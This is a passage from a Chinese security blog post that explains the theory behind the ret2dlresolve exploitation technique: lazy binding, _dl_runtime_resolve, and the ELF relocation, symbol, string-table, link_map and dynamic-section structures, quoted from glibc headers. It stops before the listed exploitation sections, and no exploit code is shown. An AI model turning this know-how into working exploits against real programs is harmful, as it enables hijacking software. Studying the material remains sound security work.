<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="ret2dlresovle攻击原理ret2dlresovle攻击的本质就是在于程序在动态链接时篡改相关结构体，让程序解析到错误的函数，进而达成攻击 Lazy Binding当程序在第一次调用某个函数时，会调用_dl_runtime_resolve函数从libc中获取这个函数的真实地址 那么具体是怎么实现的呢？ 动态链接的程序调用函数时会先call一个函数的plt表，如read@plt，执行read">
<meta property="og:type" content="article">
<meta property="og:title" content="ret2dlresolve超详解">
<meta property="og:url" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/index.html">
<meta property="og:site_name" content="PuH4ck3rX&#39;s Blog">
<meta property="og:description" content="ret2dlresovle攻击原理ret2dlresovle攻击的本质就是在于程序在动态链接时篡改相关结构体，让程序解析到错误的函数，进而达成攻击 Lazy Binding当程序在第一次调用某个函数时，会调用_dl_runtime_resolve函数从libc中获取这个函数的真实地址 那么具体是怎么实现的呢？ 动态链接的程序调用函数时会先call一个函数的plt表，如read@plt，执行read">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_18-24-55-1745939812038-1.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_18-24-55-1741084407261-2-1745939812039-3.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/ret2dlresolve--2.related-sections-1745939812039-5.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/202406051458206-1745939812039-7.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_23-43-35-1745939812039-9.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-05_00-07-40-1745939812039-13.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305002003747-1745939812039-11.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305002029521-1745939812039-15.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003048577-1745939812039-17.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003232146-1745939812039-19.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003304085-1745939812039-21.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305004030135.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003736753.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305003844655.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305004650994.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305005337679.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305011200923.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305011401972.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250305185526111.png">
<meta property="og:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/image-20250306103950624.png">
<meta property="article:published_time" content="2025-04-29T14:55:50.000Z">
<meta property="article:modified_time" content="2025-04-29T16:10:27.348Z">
<meta property="article:author" content="PuH4ck3rX">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_18-24-55-1745939812038-1.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>ret2dlresolve超详解</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">h0m3</a></li><!--
     --><!--
       --><li><a href="/about/">ab0ut</a></li><!--
     --><!--
       --><li><a href="/archives/">art1cl3s</a></li><!--
     --><!--
       --><li><a href="/search/">s3arch</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2025/04/29/hello-world/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&text=ret2dlresolve超详解"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&is_video=false&description=ret2dlresolve超详解"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=ret2dlresolve超详解&body=Check out this article: http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&title=ret2dlresolve超详解"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&name=ret2dlresolve超详解&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/&t=ret2dlresolve超详解"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2dlresovle%E6%94%BB%E5%87%BB%E5%8E%9F%E7%90%86"><span class="toc-number">1.</span> <span class="toc-text">ret2dlresovle攻击原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Lazy-Binding"><span class="toc-number">1.1.</span> <span class="toc-text">Lazy Binding</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Related-Dynamic-Sections"><span class="toc-number">1.2.</span> <span class="toc-text">Related Dynamic Sections</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Elf-Rel%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.1.</span> <span class="toc-text">Elf_Rel结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Elf-Sym%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.2.</span> <span class="toc-text">Elf_Sym结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#dynstr%E8%8A%82"><span class="toc-number">1.2.3.</span> <span class="toc-text">dynstr节</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#link-map%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.4.</span> <span class="toc-text">link_map结构体</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Elfxx-Dyn%E7%BB%93%E6%9E%84%E4%BD%93"><span class="toc-number">1.2.5.</span> <span class="toc-text">Elfxx_Dyn结构体</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%A4%A7%E6%A6%82%E8%A7%A3%E6%9E%90%E6%B5%81%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">大概解析流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8A%A8%E6%80%81%E8%B0%83%E5%BC%8F%E6%9F%A5%E7%9C%8B%E5%85%B7%E4%BD%93%E8%A7%A3%E6%9E%90%E6%B5%81%E7%A8%8B"><span class="toc-number">1.4.</span> <span class="toc-text">动态调式查看具体解析流程</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9Alink-map%E4%B8%ADl-info%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.1.</span> <span class="toc-text">确定link_map中l_info的地址</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%A1%AE%E5%AE%9A%E5%8A%A8%E6%80%81%E9%93%BE%E6%8E%A5%E6%89%80%E9%9C%80%E7%9A%84%E5%87%A0%E4%B8%AA%E8%8A%82%E7%9A%84%E5%9C%B0%E5%9D%80"><span class="toc-number">1.4.2.</span> <span class="toc-text">确定动态链接所需的几个节的地址</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#dynstr-addr"><span class="toc-number">1.4.2.1.</span> <span class="toc-text">dynstr_addr</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#dynsym-addr"><span class="toc-number">1.4.2.2.</span> <span class="toc-text">dynsym_addr</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#rel-plt-addr"><span class="toc-number">1.4.2.3.</span> <span class="toc-text">.rel.plt_addr</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%80%9A%E8%BF%87read%E5%87%BD%E6%95%B0%E6%9D%A5%E8%A7%82%E5%AF%9F%E6%98%AF%E6%80%8E%E4%B9%88%E6%89%BE%E5%88%B0%E7%AC%A6%E5%8F%B7%E5%90%8D%E7%A7%B0%E7%9A%84"><span class="toc-number">1.4.3.</span> <span class="toc-text">通过read函数来观察是怎么找到符号名称的</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#ret2dlresolve%E4%B9%8BNo-Relro"><span class="toc-number">2.</span> <span class="toc-text">ret2dlresolve之No-Relro</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#32%E4%BD%8D%E4%B8%8BNo-Relro"><span class="toc-number">2.1.</span> <span class="toc-text">32位下No-Relro</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#64%E4%BD%8D%E4%B8%8BNo-Relro"><span class="toc-number">2.2.</span> <span class="toc-text">64位下No-Relro</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        ret2dlresolve超详解
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">PuH4ck3rX</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2025-04-29T14:55:50.000Z" class="dt-published" itemprop="datePublished">2025-04-29</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h2 id="ret2dlresovle攻击原理"><a href="#ret2dlresovle攻击原理" class="headerlink" title="ret2dlresovle攻击原理"></a>ret2dlresovle攻击原理</h2><p>ret2dlresovle攻击的本质就是在于程序在动态链接时篡改相关结构体，让程序解析到错误的函数，进而达成攻击</p>
<h3 id="Lazy-Binding"><a href="#Lazy-Binding" class="headerlink" title="Lazy Binding"></a>Lazy Binding</h3><p>当程序在第一次调用某个函数时，会调用_dl_runtime_resolve函数从libc中获取这个函数的真实地址</p>
<p>那么具体是怎么实现的呢？</p>
<p>动态链接的程序调用函数时会先call一个函数的plt表，如read@plt，执行read@plt表里的第一条指令，read@plt表里的第一条指令是jmp到got表中，执行got表里存放的地址所指向的指令，got表默认存放的是read@plt中下一条指令的地址，通过_dl_runtime_resolve函数解析libc中的真实地址后会将函数的真实地址填入到该函数的got表中</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_18-24-55-1745939812038-1.png" alt="Snipaste_2025-03-04_18-24-55"></p>
<p><strong>_dl_runtime_resolve</strong>函数有两个参数，一个是reloc_index(<strong>reloc_index参数标识了具体要导入哪个函数</strong>)，一个是link_map的地址</p>
<p>这里和普通函数调用方式不一样，会先push一个reloc_index，然后跳转到一个地址，push link_map的地址</p>
<p>然后再跳转到_dl_runtime_resolve，我们会发现dl_runtime_resolve函数最终调用的是_dl_fixup函数</p>
<p>也就是最终解析在libc中真实地址的函数</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/Snipaste_2025-03-04_18-24-55-1741084407261-2-1745939812039-3.png" alt="Snipaste_2025-03-04_18-24-55"></p>
<h3 id="Related-Dynamic-Sections"><a href="#Related-Dynamic-Sections" class="headerlink" title="Related Dynamic Sections"></a>Related Dynamic Sections</h3><p>在深入了解_dl_runtime_resolve函数是怎么寻找到真实地址之前我们需要先了解几个基本结构体</p>
<p><img src="/2025/04/29/ret2dlresolve%E8%B6%85%E8%AF%A6%E8%A7%A3/index/ret2dlresolve--2.related-sections-1745939812039-5.png" alt="ret2dlresolve--2.related-sections"></p>
<h4 id="Elf-Rel结构体"><a href="#Elf-Rel结构体" class="headerlink" title="Elf_Rel结构体"></a>Elf_Rel结构体</h4><p>Elf_Rel实例化的每一个项组成了.rel.plt节</p>
<p>ELF 文件中的 <code>.rel.plt</code> 是一个 <strong>重定位表（Relocation Table）</strong>，用于存储 <strong>PLT（Procedure Linkage Table）</strong> 相关的重定位信息，主要用于延迟绑定（Lazy Binding）。</p>
<p>我们只关心Elf_Rel结构体的两个域，一个是r_offset一个是r_info，r_offset是用于告诉解析真实地址的函数解析后的地址往哪里写(这些也就组成了got表)，r_info则是当前项所代表的函数在.dynsym节中的偏移，下面放出Elf_Rel结构体的代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">typedef struct &#123;</span><br><span class="line">    Elf32_Addr  r_offset;  /* 需要进行重定位的地址 */</span><br><span class="line">    Elf32_Word  r_info;    /* 符号表索引和重定位类型 */</span><br><span class="line">&#125; Elf32_Rel;</span><br></pre></td></tr></table></figure>

<h4 id="Elf-Sym结构体"><a href="#Elf-Sym结构体" class="headerlink" title="Elf_Sym结构体"></a>Elf_Sym结构体</h4><p>符号表（Symbol Table）用于记录程序中所有函数和全局变量的信息。每个符号在符号表中对应一个条目，这些条目由 <code>Elf32_Sym</code> 或 <code>Elf64_Sym</code> 结构体表示</p>
<p>我们在ELF32_Sym主要关心st_name，st_name是当前项所代表的函数在.dynstr节中的偏移</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">typedef struct &#123;</span><br><span class="line">    Elf32_Word  st_name;  /* 符号名在字符串表中的下标 */</span><br><span class="line">    Elf32_Addr  st_value; /* 符号对应的值（地址或偏移量） */</span><br><span class="line">    Elf32_Word  st_size;  /* 符号的大小 */</span><br><span class="line">    unsigned char st_info; /* 符号类型和绑定信息 */</span><br><span class="line">    unsigned char st_other;/* 其他信息（通常未使用，值为 0） */</span><br><span class="line">    Elf32_Half  st_shndx; /* 符号所在的节在节头表中的索引 */</span><br><span class="line">&#125; Elf32_Sym;</span><br></pre></td></tr></table></figure>

<h4 id="dynstr节"><a href="#dynstr节" class="headerlink" title="dynstr节"></a>dynstr节</h4><p>在动态链接过程中，<code>.dynstr</code> 节与 <code>.dynsym</code> 节协同工作。<code>.dynsym</code> 节保存需要动态链接的符号表，每个符号都有一个 <code>st_name</code> 字段，该字段是一个索引，指向 <code>.dynstr</code> 节中相应符号名称的起始位置</p>
<p>.dynstr节是用来存放动态链接中所需解析的函数名的</p>
<h4 id="link-map结构体"><a href="#link-map结构体" class="headerlink" title="link_map结构体"></a>link_map结构体</h4><p><code>link_map</code>是描述已加载的共享对象的结构体，采用双链表管理，该数据结构保存在<code>ld.so</code>的<code>.bss</code>段中。我们主要关注其中几个域</p>
<ol>
<li><p><code>l_addr</code>：共享对象的加载基址；</p>
</li>
<li><p><code>l_next</code>，<code>l_prev</code>：管理<code>link_map</code>的双链表指针；</p>
</li>
<li><p><code>l_info</code>：保存<code>Elfxx_Dyn</code>结构体指针的列表，用来寻找各节基址；如<code>l_info[DT_STRTAB]</code>指向保存着函数解析字符串表基址的<code>Elfxx_Dyn</code>结构体。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">/* 描述已加载共享对象的结构体。`l_next` 和 `l_prev` 成员</span><br><span class="line">   形成了在启动时加载的所有共享对象的链表。</span><br><span class="line">   这些数据结构存在于运行时动态链接器使用的空间中；</span><br><span class="line">   修改它们可能会导致严重后果。</span><br><span class="line">   如果有必要，这个数据结构在未来可能会改变。</span><br><span class="line">   用户级程序必须避免定义此类型的对象。  */</span><br><span class="line">struct link_map</span><br><span class="line">  &#123;</span><br><span class="line">    /* 以下几个成员是与调试器协议的一部分。</span><br><span class="line">       这与 SVR4 中使用的格式相同。  */</span><br><span class="line">    ElfW(Addr) l_addr;             /* ELF 文件中的地址与内存中地址之间的差异。  */</span><br><span class="line">    char *l_name;                  /* 对象文件的绝对路径名。  */</span><br><span class="line">    ElfW(Dyn) *l_ld;               /* 共享对象的动态段。  */</span><br><span class="line">    struct link_map *l_next, *l_prev; /* 已加载对象的链表。  */</span><br><span class="line"></span><br><span class="line">    /* 以下所有成员仅供动态链接器内部使用。</span><br><span class="line">       它们可能会在没有通知的情况下更改。  */</span><br><span class="line"></span><br><span class="line">    /* 当在多个命名空间中使用时，这个元素与指向相同类型的副本的指针不同。  */</span><br><span class="line">    struct link_map *l_real;</span><br><span class="line"></span><br><span class="line">    /* 此 link map 所属的命名空间的编号。  */</span><br><span class="line">    Lmid_t l_ns;</span><br><span class="line"></span><br><span class="line">    struct libname_list *l_libname;</span><br><span class="line"></span><br><span class="line">    /* 动态段信息数组。 */</span><br><span class="line">    ElfW(Dyn) *l_info[DT_NUM + DT_THISPROCNUM + DT_VERSIONTAGNUM</span><br><span class="line">                      + DT_EXTRANUM + DT_VALNUM + DT_ADDRNUM];</span><br><span class="line"></span><br><span class="line">    const ElfW(Phdr) *l_phdr;      /* 指向内存中程序头表的指针。  */</span><br><span class="line">    ElfW(Addr) l_entry;            /* 入口点位置。  */</span><br><span class="line">    ElfW(Half) l_phnum;            /* 程序头表条目数量。  */</span><br><span class="line">    ElfW(Half) l_ldnum;            /* 动态段条目数量。  */</span><br><span class="line">  &#125;;</span><br></pre></td></tr></table></figure></li>
</ol>
<h4 id="Elfxx-Dyn结构体"><a href="#Elfxx-Dyn结构体" class="headerlink" title="Elfxx_Dyn结构体"></a>Elfxx_Dyn结构体</h4><p>Elf(32&#x2F;64)_Dyn结构体存放在<code>.dynamic</code>节中，说具体些就是键值对，关键字是各个动态段的标识，值则是各个动态段的对应的基址，包括之前说的的<code>.ret.plt</code>、<code>.dynsym</code>、<code>dynstr</code>节等。其主要作用就是在解析函数地址时使用这些键值对来找到各个动态段的基址，以确定数据条目的位置。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">typedef struct</span><br><span class="line">&#123;</span><br><span class="line">  Elf32_Sword   d_tag;                  /* Dynamic entry type */</span><br><span class="line">  union                                 </span><br><span class="line">    &#123;</span><br><span class="line">      Elf32_Word d_val;                 /* Integer value */</span><br><span class="line">      Elf32_Addr d_ptr;                 /* Entry Address */</span><br><span class="line">    &#125; d_un;</span><br><span class="line">&#125; Elf32_Dyn;</span><br><span class="line"></span><br><span class="line">typedef struct</span><br><span class="line">&#123;</span><br><span class="line">  Elf64_Sxword        d_tag;           /* Dynamic entry type */</span><br><span class="line">  union</span><br><span class="line">    &#123;</span><br><span class="line">      Elf64_Xword d_val;               /* Integer value */</span><br><span class="line">      Elf64_Addr d_ptr;                /* Address value */</span><br><span class="line">    &#125; d_un;</span><br><span class="line">&#125; Elf64_Dyn;</span><br></pre></td></tr></table></figure>

<p><code>d_tag</code>定义如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line">/* Legal values for d_tag (dynamic entry type).  */</span><br><span class="line">#define DT_NULL                0                /* Marks end of dynamic section */</span><br><span class="line">#define DT_NEEDED              1                /* Name of needed library */</span><br><span class="line">#define DT_PLTRELSZ            2                /* Size in bytes of PLT relocs */</span><br><span class="line">#define DT_PLTGOT              3                /* Processor defined value */</span><br><span class="line">#define DT_HASH                4                /* Address of symbol hash table */</span><br><span class="line">#define DT_STRTAB              5                /* Address of string table */</span><br><span class="line">#define DT_SYMTAB              6                /* Address of symbol table */</span><br><span class="line">#define DT_RELA                7                /* Address of Rela relocs */</span><br><span class="line">#define DT_RELASZ              8                /* Total size of Rela relocs */</span><br><span class="line">#define DT_RELAENT             9                /* Size of one Rela reloc */</span><br><span class="line">#define DT_STRSZ              10                /* Size of string table */</span><br><span class="line">#define DT_SYMENT             11                /* Size of one symbol table entry */</span><br><span class="line">#define DT_INIT               12                /* Address of init function */</span><br><span class="line">#define DT_FINI               13                /* Address of termination function */</span><br><span class="line">#define DT_SONAME             14                /* Name of shared object */</span><br><span class="line">#define DT_RPATH              15                /* Library search path (deprecated) */</span><br><span class="line">#define DT_SYMBOLIC           16                /* Start symbol search here */</span><br><span class="line">#define DT_REL                17                /* Address of Rel relocs */</span><br><span class="line">#define DT_RELSZ              18                /* Total size of Rel relocs */</span><br><span class="line">#define DT_RELENT             19                /* Size of one Rel reloc */</span><br><span class="line">#define DT_PLTREL             20                /* Type of reloc in PLT */</span><br><span class="line">#define DT_DEBUG              21                /* For debugging; unspecified */</span><br><span class="line">#define DT_TEXTREL            22                /* Reloc might modify .text */</span><br><span class="line">#define DT_JMPREL             23                /* Address of PLT relocs */</span><br><span class="line">#define DT_BIND_NOW           24                /* Process relocations of object */</span><br><span class="line">#define DT_INIT_ARRAY         25                /* Array with addresses of init fct */</span><br><span class="line">#define DT_FINI_ARRAY         26                /* Array with addresses of fini fct */</span><br><span class="line">#define DT_INIT_ARRAYSZ       27                /* Size in bytes of DT_INIT_ARRAY */</span><br><span class="line">#define DT_FINI_ARRAYSZ       28                /* Size in bytes of DT_FINI_ARRAY */</span><br><span class="line">#define DT_RUNPATH            29                /* Library search path */</span><br><span class="line">#define DT_FLAGS              30                /* Flags for the object being loaded */</span><br><span class="line">#define DT_ENCODING           32                /* Start of encoded range */</span><br><span class="line">#define DT_PREINIT_ARRAY      32                /* Array with addresses of preinit fct*/</span><br><span class="line">#define DT_PREINIT_ARRAYSZ    33                /* size in bytes of DT_PREINIT_ARRAY */</span><br><span class="line">#define DT_SYMTAB_SHNDX       34                /* Address of SYMTAB_SHNDX section */</span><br><span class="line">#define DT_NUM                35                /* Number used */</span><br></pre></td></tr></table></figure>

<p>我们需要关心的也就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">#define DT_STRTAB              5                /* Address of string table */</span><br><span class="line">#define DT_SYMTAB              6                /* Address of symbol table */</span><br><span class="line">#define DT_JMPREL             23                /* Address of PLT relocs */</span><br></pre></td></tr></table></figure>

